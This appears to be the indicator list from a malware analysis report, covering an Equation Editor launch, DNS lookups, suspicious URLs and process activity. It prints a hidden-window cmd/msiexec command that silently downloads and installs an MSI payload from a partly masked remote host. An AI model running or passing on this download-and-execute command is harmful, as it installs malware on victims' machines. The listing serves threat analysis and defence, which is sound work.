Technical Information
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://s2####3.smrtp.ru/thr/bi.msi /qn
- http://s2####3.smrtp.ru/thr/bi.msi
- http://ag####ight.com.my/cgi-sys/suspendedpage.cgi
- http://ag####ight.com.my/inc/js/colorbox/bi-secure/index.php
- DNS ASK s2####3.smrtp.ru
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK ag####ight.com.my
- '%WINDIR%\installer\msif5.tmp'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://s2####3.smrtp.ru/thr/bi.msi /qn' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i http://s2####3.smrtp.ru/thr/bi.msi /qn
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'